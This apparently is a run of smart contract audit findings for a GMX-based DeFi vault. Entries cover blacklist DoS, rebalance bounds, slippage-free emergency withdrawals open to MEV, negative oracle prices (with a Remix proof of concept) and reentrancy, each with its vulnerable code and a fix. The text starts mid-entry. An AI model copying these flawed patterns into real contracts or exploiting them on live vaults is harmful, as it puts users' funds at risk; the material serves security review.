code\\n self.status = GMXTypes.Status.Open;\\n\\n emit DepositCancelled(self.depositCache.user);\\n}\\n```\\n\\n```\\nfunction processDepositFailureLiquidityWithdrawal(\\n GMXTypes.Store storage self\\n) public {\\n GMXChecks.beforeProcessAfterDepositFailureLiquidityWithdrawal(self);\\n // rest of code\\n // Refund user the rest of the remaining withdrawn LP assets\\n // Will be in tokenA/tokenB only; so if user deposited LP tokens\\n // they will still be refunded in tokenA/tokenB\\n self.tokenA.safeTransfer(self.depositCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.depositCache.user, self.tokenB.balanceOf(address(this)));\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n}\\n```\\n\\n```\\nfunction processWithdraw(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessWithdrawChecks(self);\\n\\n try GMXProcessWithdraw.processWithdraw(self) {\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n // rest of code\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n \\n // rest of code\\n\\n self.status = GMXTypes.Status.Open;\\n }\\n // rest of code\\n}\\n```\\n
Instead of transferring the ERC-20 tokens directly to a user in the process functions, use a two-step process instead. For example, create another contract whose only purpose is to hold assets and store the information about which address is allowed to withdraw how many of the specified tokens. In the process functions, send the funds to this new contract along with this information instead. So if a user has been blacklisted, the DoS only exists for that specific user and for the rest of the users the system continues to function normally.
DoS of the entire strategy vault, as the status can no longer be updated to Open until the user is no longer blacklisted. This can potentially take forever and forces the owners to take emergency action.
```\\nfunction processDepositCancellation(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessDepositCancellationChecks(self);\\n // rest of code\\n // Transfer requested withdraw asset to user\\n IERC20(self.depositCache.depositParams.token).safeTransfer(\\n self.depositCache.user,\\n self.depositCache.depositParams.amt\\n );\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n\\n emit DepositCancelled(self.depositCache.user);\\n}\\n```\\n
Rebalance may occur due to wrong requirements check
low
Before a rebalance can occur, checks are implemented to ensure that `delta` and `debtRatio` remain within their specified limits. However, it's important to note that the check in `GMXChecks::beforeRebalanceChecks` ignores the scenario where these values are equal to any of their limits.\\nIn the current implementation of the `GMXRebalance::rebalanceAdd` function, it first calculates the current values of `debtRatio` and `delta` before making any changes. Subsequently, the `beforeRebalanceChecks` function, checks if these values meet the requirements for a rebalance to occur. These requirements now dictate that both `debtRatio` and `delta` must be either ≥ to the `UpperLimit`, or ≤ to the `LowerLimit` for a rebalance to take place.\\n```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n}\\n```\\n\\nSuppose a rebalance is successful. In the `afterRebalanceChecks` section, the code verifies whether both `delta` and `debtRatio` are greater than the `UpperLimit` or less than the `LowerLimit`. This confirmation implies that these limits are indeed inclusive, meaning that the correct interpretation of these limits should be that `LowerLimit` ≤ actualValue ≤ `UpperLimit`. On the other hand, this also indicates that for a rebalancing to occur, the values of `deltaBefore` and `debtRatioBefore` need to be outside their limits, i.e., `delta` should be greater than `Upper` or less than `Lower`. However, in the current implementation, if these values are equal to the limit, a rebalance may still occur, which violates the consistency of the `afterRebalanceChecks` function, thus indicating that these limits are inclusive. Consequently, a value equal to the limit needs to be treated as valid and not be able to trigger a rebalance.\\n```\\nfunction afterRebalanceChecks(\\n GMXTypes.Store storage self\\n) external view {\\n // Guards: check that delta is within limits for Neutral strategy\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n int256 _delta = GMXReader.delta(self);\\n\\n if (\\n _delta > self.deltaUpperLimit ||\\n _delta < self.deltaLowerLimit\\n ) revert Errors.InvalidDelta();\\n }\\n\\n // Guards: check that debt is within limits for Long/Neutral strategy\\n uint256 _debtRatio = GMXReader.debtRatio(self);\\n\\n if (\\n _debtRatio > self.debtRatioUpperLimit ||\\n _debtRatio < self.debtRatioLowerLimit\\n ) revert Errors.InvalidDebtRatio();\\n}\\n```\\n\\nImagine the case when `delta` or `debtRatio` is equal to any of its limits; a rebalance will occur. However, on the other hand, these values are valid because they are inclusively within the limits.
Rebalance may occur due to wrong requirements check\\nConsider a strict check to determine if `delta` or `debtRatio` is strictly within its limits, including scenarios where they are equal to any of its limits. In such cases, the code should ensure that a rebalance does not occur when these values are precisely at the limit.\\n```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n ) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n// Remove the line below\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n// Remove the line below\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n// Add the line below\\n self.rebalanceCache.healthParams.deltaBefore <= self.deltaUpperLimit &&\\n// Add the line below\\n self.rebalanceCache.healthParams.deltaBefore >= self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n// Remove the line below\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n// Remove the line below\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n// Add the line below\\n self.rebalanceCache.healthParams.debtRatioBefore <= self.debtRatioUpperLimit &&\\n// Add the line below\\n self.rebalanceCache.healthParams.debtRatioBefore >= self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n }\\n```\\n
In such a scenario, the system might incorrectly trigger a rebalance of the vault, even when `delta` or `debtRatio` is precisely within the established limits, thus potentially causing unintended rebalancing actions.
```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n}\\n```\\n
Wrong errors are used for reverts
low
There are checks that revert with wrong errors\\nReverts:\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L68-L69\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L74-L75\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L351-L352\\n```\\nFile: contracts/strategy/gmx/GMXChecks.sol\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.depositCache.depositParams.amt == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.compoundCache.depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n```\\n
Wrong errors are used for reverts\\nConsider using `Errors.EmptyDepositAmount` for the provided cases.
This can lead to user confusion as they won't receive the accurate revert reason.
```\\nFile: contracts/strategy/gmx/GMXChecks.sol\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.depositCache.depositParams.amt == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.compoundCache.depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n```\\n
Transfer Limit of UNI Tokens May Lead to a DoS and Token Loss Risk
low
Users who accumulate more than 2^96 UNI tokens may lose their tokens because transfers above that will always revert.\\nThe UNI token contract imposes a transfer limit, restricting the maximum amount of tokens that can be transferred in a single transaction to 2^96 UNI tokens. Any transfer exceeding this threshold will trigger a transaction revert. The contract relies on the `balanceOf` function to verify the sender's token balance before proceeding with a transfer.\\n```\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n```\\n\\nsuch a transfer will always revert for balances above 2^96 UNI tokens\\nhttps://github.com/d-xo/weird-erc20#revert-on-large-approvals--transfers
Transfer Limit of UNI Tokens May Lead to a DoS and Token Loss Risk\\nContracts should always check the amount of UNI being transferred before processing the transaction.
Users who accumulate more than 2^96 UNI tokens may lose their tokens due to a DOS revert when attempting to withdraw their token balance.
```\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n```\\n
`emergencyClose()` may fail to repay any debt
medium
the `emergencyClose()` function may become ineffective, preventing the contract from repaying any outstanding debt, leading to potential financial losses.\\nWhen the contract is paused, all the liquidity from GMX is withdrawn (in term of `tokenA` and tokenB).\\nThe `emergencyClose()` function is called after the contract is paused due some reasons, possibly when the strategy incurs bad debts or when the contract gets hacked, High volatility, and so on...\\nThis function is responsible for repaying all the amounts of `tokenA` and `tokenB` borrowed from the `lendingVault` contract. It then sets the contract's status to `closed`. After that, users who hold `svToken` shares can withdraw the remaining assets from the contract.\\nThe issue with this function lies in its assumptions, which are not accurate. It assumes that the withdrawn amounts from GMX are always sufficient to cover the whole debt.\\n```\\n function emergencyClose(GMXTypes.Store storage self, uint256 deadline) external {\\n // Revert if the status is Paused.\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (_rp.repayTokenAAmt, _rp.repayTokenBAmt) = GMXManager.calcRepay(self, 1e18);\\n\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n GMXManager.repay(self, _rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(_rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n }\\n }\\n```\\n\\nPlease note that `_rp.repayTokenAAmt` and `_rp.repayTokenBAmt` represent the entire debt, and these values remain the same even if a swap is needed.\\nThe function checks if a swap is needed to cover its debt, and here's how it determines whether a swap is required:\\n```\\n function calcSwapForRepay(GMXTypes.Store storage self, GMXTypes.RepayParams memory rp)\\n external\\n view\\n returns (bool, address, address, uint256)\\n {\\n address _tokenFrom;\\n address _tokenTo;\\n uint256 _tokenToAmt;\\n if (rp.repayTokenAAmt > self.tokenA.balanceOf(address(this))) {\\n // If more tokenA is needed for repayment\\n _tokenToAmt = rp.repayTokenAAmt - self.tokenA.balanceOf(address(this));\\n _tokenFrom = address(self.tokenB);\\n _tokenTo = address(self.tokenA);\\n\\n return (true, _tokenFrom, _tokenTo, _tokenToAmt);\\n } else if (rp.repayTokenBAmt > self.tokenB.balanceOf(address(this))) {\\n // If more tokenB is needed for repayment\\n _tokenToAmt = rp.repayTokenBAmt - self.tokenB.balanceOf(address(this));\\n _tokenFrom = address(self.tokenA);\\n _tokenTo = address(self.tokenB);\\n\\n return (true, _tokenFrom, _tokenTo, _tokenToAmt);\\n } else {\\n // If there is enough to repay both tokens\\n return (false, address(0), address(0), 0);\\n }\\n }\\n```\\n\\nIn plain English, this function in this case assumes: if the contract's balance of one of the tokens (e.g., tokenA) is insufficient to cover `tokenA` debt, it means that the contract balance of the other token (tokenB) should be greater than the debt of `tokenB`, and the value of the remaining balance of `tokenB` after paying off the `tokenB` debt should be equal or greater than the required value to cover the debt of `tokenA`\\nThe two main issues with this assumption are:\\nIf the contract balance of `tokenFrom` is not enough to be swapped for `_tokenToAmt` of `tokenTo`, the swap will revert, causing the function to revert each time it is called when the balance of `tokenFrom` is insufficient.(in most cases in delta long strategy since it's only borrow one token), This is highly likely since emergency closures occur when something detrimental has happened, (such as bad debts).\\nThe second issue arises when the balance of tokenFrom(EX: tokenA) becomes less than `_rp.repayTokenAAmt` after a swap. In this case, the `repay` call will revert when the `lendingVault` contract attempts to `transferFrom` the strategy contract for an amount greater than its balance. ex :\\n`tokenA` balance = 100, debtA = 80.\\ntokenB balance = 50 , debtB = 70.\\nafter swap `tokenA` for 20 tokenB .\\n`tokenA` balance = 75 , debtA = 80 : in this case `repay` will keep revert .\\nso if the contract accumulates bad debts(in value), the `emergencyClose()` function will always revert, preventing any debt repayment.\\nAnother critical factor to consider is the time between the `pause` action and the emergency `close` action. During periods of high volatility, the `pause` action temporarily halts the contract, but the prices of the two assets may continue to decline. The emergency `close` function can only be triggered by the owner, who operates a time-lock wallet. In the time between the `pause` and `close` actions, the prices may drop significantly and this condition will met since the `swap` is needed in almost all cases.
the debt need to be repayed in the `pause` action. and in case of `resume` just re-borrow again.
`emergencyClose()` function will consistently fail to repay any debt.\\nlenders may lose all their funds
```\\n function emergencyClose(GMXTypes.Store storage self, uint256 deadline) external {\\n // Revert if the status is Paused.\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (_rp.repayTokenAAmt, _rp.repayTokenBAmt) = GMXManager.calcRepay(self, 1e18);\\n\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n GMXManager.repay(self, _rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(_rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n }\\n }\\n```\\n
Missing minimum token amounts in the emergency contract functions allows MEV bots to take advantage of the protocols emergency situation
medium
When an emergency situation arises and the protocol pauses or resumes the operation of the vault. All funds of the vault are removed from GMX or added back to GMX without any protection against slippage. This allows MEV bots to take advantage of the protocol's emergency situation and make huge profits with it.\\nWhen an emergency situation arises the protocol owners can call the emergencyPause function to remove all the liquidity from GMX:\\n```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n\\nBut the minimum tokens amount to get back when removing liquidity is not provided to the RemoveLiquidityParams:\\n```\\nstruct RemoveLiquidityParams {\\n // Amount of lpToken to remove liquidity\\n uint256 lpAmt;\\n // Array of market token in array to swap tokenA to other token in market\\n address[] tokenASwapPath;\\n // Array of market token in array to swap tokenB to other token in market\\n address[] tokenBSwapPath;\\n // Minimum amount of tokenA to receive in token decimals\\n uint256 minTokenAAmt;\\n // Minimum amount of tokenB to receive in token decimals\\n uint256 minTokenBAmt;\\n // Execution fee sent to GMX for removing liquidity\\n uint256 executionFee;\\n}\\n```\\n\\nAs it is not set, the default value 0 (uint256) is used. Therefore, up to 100% slippage is allowed.\\nThe same parameters are also missing when normal operation resumes:\\n```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n}\\n```\\n\\nTherefore, MEV bots could take advantage of the protocol's emergency situation and as these trades include all funds of the vault it could lead to a big loss.\\nIgnoring slippage when pausing could be a design choice of the protocol to avoid the possibility of a revert and pause the system as quickly as possible. However, this argument does not apply during the resume.
Implement a custom minMarketTokens parameter, but do not implement the usual slippage calculation, as this could potentially lead to new critical vulnerabilities. If for example the reason for this emergency situation is a no longer supported chainlink feed, which will lead to reverts and therefore also to DoS of the emergency close / withdraw flow.
Big loss of funds as all funds of the strategy vault are unprotected against MEV bots.
```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n
A bad price can be delivered in ChainlinkARBOracle
low
When the `consultIn18Decimals()` is called, can be returned a negative value. Because not exist correct validation for negative response.\\nThe `ChainlinkARBOracle.sol` has to garantie delivered correct price. Howerver exist a potencial scenario of this situation may be breaking.\\nLets break each one part of this scenario:\\nWhen `consultIn18Decimals()` is called, and call to `consult()` this function is encharge `of` verifie each answer and delivere a price not old, not zero,non-negative and garantie `of` sequencer is up.\\nPosible scenario in `consult()` for the moment, we have: `chainlinkResponse.answer = x where x > 0` `prevChainlinkResponse.answer = y where y < 0` This is a negative value given by Chainlink\\n`_chainlinkIsFrozen()` is pass correctly\\n`_chainlinkIsBroken(chainlinkResponse, prevChainlinkResponse, token)` evaluate the following functions:\\n`_badChainlinkResponse(currentResponse)` pass correctly.\\n`_badChainlinkResponse(prevResponse)` pass also correctly because is only check if the value is zero, but not negative see : `if (response.answer == 0) { return true; }`\\n_badPriceDeviation(currentResponse, prevResponse, token): `if( currentResponse.answer > prevResponse.answer)` remember `currentResponse.answer = x where x > 0 and prevResponse.answer = y where y < 0` So. x > y . This condition is passed successfully..\\nFor the evaluation `of` `_deviation` we have: `_deviation = uint256(currentResponse.answer - prevResponse.answer) * SAFE_MULTIPLIER / uint256(prevResponse.answer); The result will always return zero. So validation on` _badPriceDeviationof_deviation > maxDeviations[token]always returnsfalsebecause zero can never be greater for any number ofmaxDeviations[token]since it only accepts numbers `of` typeuint256 `\\nPOC :\\nThis scenario is illustrated in a minimalist example, which you can use in Remix:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.21;\\n\\nimport { SafeCast } from "@openzeppelin/contracts/utils/math/SafeCast.sol";\\n\\nerror BrokenTokenPriceFeed();\\n\\ncontract PassWithNegativePrice {\\n\\n using SafeCast for int256;\\n\\n uint256 public maxDeviations;\\n int256 public currentResponse;\\n int256 public prevResponse;\\n uint8 public decimal;\\n \\n constructor(int256 _currentResponse, int256 _prevResponse, uint8 _decimal,uint256 _maxDeviation ) {\\n currentResponse = _currentResponse; // _currentResponse > 0 e.g. 2000, 3, 90000000000000\\n prevResponse = _prevResponse; // _prevResponse < 0 e.g. -3000, -1 \\n decimal = _decimal; // _decimal can be 8, 18\\n maxDeviations = _maxDeviation; // any value\\n } \\n \\n // You call this function, result is currentResponse but doesn't matter maxDeviations value\\n function consultIn18Decimals() external view returns (uint256) {\\n \\n (int256 _answer, uint8 _decimals) = consult();\\n\\n return _answer.toUint256() * 1e18 / (10 ** _decimals);\\n }\\n\\n function consult() internal view returns (int256, uint8) { \\n\\n if (_badPriceDeviation(currentResponse, prevResponse) )revert BrokenTokenPriceFeed();\\n\\n return (currentResponse, decimal);\\n }\\n\\n function _badPriceDeviation(int256 _currentResponse, int256 _prevResponse ) internal view returns (bool) {\\n // Check for a deviation that is too large\\n uint256 _deviation;\\n\\n if (_currentResponse > _prevResponse) { // Here is our scene, always result be zero with negative value of _prevResponse\\n _deviation = uint256(_currentResponse - _prevResponse) * 1e18 / uint256(_prevResponse);\\n } else {\\n _deviation = uint256(_prevResponse - _currentResponse) * 1e18 / uint256(_prevResponse);\\n }\\n\\n return _deviation > maxDeviations;\\n }\\n\\n\\n}\\n```\\n
This behavior can be mitigated by setting the correct conditional:\\n```\\nif (response.answer <= 0) { return true; }\\n```\\n\\nAlso,due of only consultIn18Decimals() is the function that is called for the protocol. Visibility to "consult" may be restricted. Change from "public" to "internal".
High, the base protocol is how you get the price of the securities. The answer may be different than what is allowed. Because the maximum deviations will not be counted.
```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.21;\\n\\nimport { SafeCast } from "@openzeppelin/contracts/utils/math/SafeCast.sol";\\n\\nerror BrokenTokenPriceFeed();\\n\\ncontract PassWithNegativePrice {\\n\\n using SafeCast for int256;\\n\\n uint256 public maxDeviations;\\n int256 public currentResponse;\\n int256 public prevResponse;\\n uint8 public decimal;\\n \\n constructor(int256 _currentResponse, int256 _prevResponse, uint8 _decimal,uint256 _maxDeviation ) {\\n currentResponse = _currentResponse; // _currentResponse > 0 e.g. 2000, 3, 90000000000000\\n prevResponse = _prevResponse; // _prevResponse < 0 e.g. -3000, -1 \\n decimal = _decimal; // _decimal can be 8, 18\\n maxDeviations = _maxDeviation; // any value\\n } \\n \\n // You call this function, result is currentResponse but doesn't matter maxDeviations value\\n function consultIn18Decimals() external view returns (uint256) {\\n \\n (int256 _answer, uint8 _decimals) = consult();\\n\\n return _answer.toUint256() * 1e18 / (10 ** _decimals);\\n }\\n\\n function consult() internal view returns (int256, uint8) { \\n\\n if (_badPriceDeviation(currentResponse, prevResponse) )revert BrokenTokenPriceFeed();\\n\\n return (currentResponse, decimal);\\n }\\n\\n function _badPriceDeviation(int256 _currentResponse, int256 _prevResponse ) internal view returns (bool) {\\n // Check for a deviation that is too large\\n uint256 _deviation;\\n\\n if (_currentResponse > _prevResponse) { // Here is our scene, always result be zero with negative value of _prevResponse\\n _deviation = uint256(_currentResponse - _prevResponse) * 1e18 / uint256(_prevResponse);\\n } else {\\n _deviation = uint256(_prevResponse - _currentResponse) * 1e18 / uint256(_prevResponse);\\n }\\n\\n return _deviation > maxDeviations;\\n }\\n\\n\\n}\\n```\\n
re-entrency possible on processWithdraw since external call is made before burning user's shares in Vault
medium
re-entrency possible on processWithdraw since external call is made before burning user's shares in Vault\\n```\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n self.WNT.withdraw(self.withdrawCache.tokensToUser);\\naudit transfer ETH and call (bool success, ) = self.withdrawCache.user.call{value: address(this).balance}("");\\n require(success, "Transfer failed.");\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n\\n // Burn user shares\\n burn is after self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/main/contracts/strategy/gmx/GMXWithdraw.sol#L182-L197\\nSince the function is only accessible by keeper (likely a router), which from the example of the mockRouter, would bundle the withdraw and "afterWithdrawalExecution" together. However since the router is out-of-scope, and there is still a possible chance that the user can make use of the router to re-enter into the function (without re-entrency lock), and be able to drain more fund that he actually deserves. This is submitted as a medium risk.
burn user's share first, before executing external call at the end.
drain of user funds.
```\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n self.WNT.withdraw(self.withdrawCache.tokensToUser);\\naudit transfer ETH and call (bool success, ) = self.withdrawCache.user.call{value: address(this).balance}("");\\n require(success, "Transfer failed.");\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n\\n // Burn user shares\\n burn is after self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n
min max price on getMarketTokenPrice is not utilized such that deposit and withdrawal can use the same price, leading to free tx for cost-free manipulation
medium
min max price on getMarketTokenPrice is not utilized such that deposit and withdrawal can use the same price, leading to free tx for cost-free manipulation\\nGMX provides getMarketTokenPrice on its synethicReader which leverages MarketUtils. It allows passing in index/long/short token price with min/max. The isDeposit flag would then be used to determine whether the min or max price would be used for calculating marketTokenPrice, this is important to always favor the protocol and prevent MEV.\\nHowever on the getMarketTokenInfo implemented in GMXOracle, it passes in the same price from the oracle to the min/max price for all long&short/lpToken. This implies the same pricing is used for both deposit and withdrawal, enabling user to freely deposit/withdraw without cost or slippage. Malicious users can use this to trigger rebalance, and hence deposit or withdrawal directly on GMX that benefit the attacker with the use of bundled tx.\\n```\\n function getMarketTokenPrice(\\n DataStore dataStore,\\n Market.Props memory market,\\n Price.Props memory indexTokenPrice,\\n Price.Props memory longTokenPrice,\\n Price.Props memory shortTokenPrice,\\n bytes32 pnlFactorType,\\n bool maximize\\n ) external view returns (int256, MarketPoolValueInfo.Props memory) {\\n return\\n MarketUtils.getMarketTokenPrice(\\n dataStore,\\n market,\\n indexTokenPrice,\\n longTokenPrice,\\n shortTokenPrice,\\n pnlFactorType,\\n maximize\\n );\\n }\\n```\\n\\nhttps://github.com/gmx-io/gmx-synthetics/blob/613c72003eafe21f8f80ea951efd14e366fe3a31/contracts/reader/Reader.sol#L187-L206
consider adding a small fee(5bps) to buffer the price returned from `_getTokenPriceMinMaxFormatted` on both sides.
free deposit and withdrawal due to the same token price is used for min or max price, which leading to the same marketTokenPrice calculation for deposit and withdrawal.
```\\n function getMarketTokenPrice(\\n DataStore dataStore,\\n Market.Props memory market,\\n Price.Props memory indexTokenPrice,\\n Price.Props memory longTokenPrice,\\n Price.Props memory shortTokenPrice,\\n bytes32 pnlFactorType,\\n bool maximize\\n ) external view returns (int256, MarketPoolValueInfo.Props memory) {\\n return\\n MarketUtils.getMarketTokenPrice(\\n dataStore,\\n market,\\n indexTokenPrice,\\n longTokenPrice,\\n shortTokenPrice,\\n pnlFactorType,\\n maximize\\n );\\n }\\n```\\n
Chainlinks oracle feeds are not immutable
medium
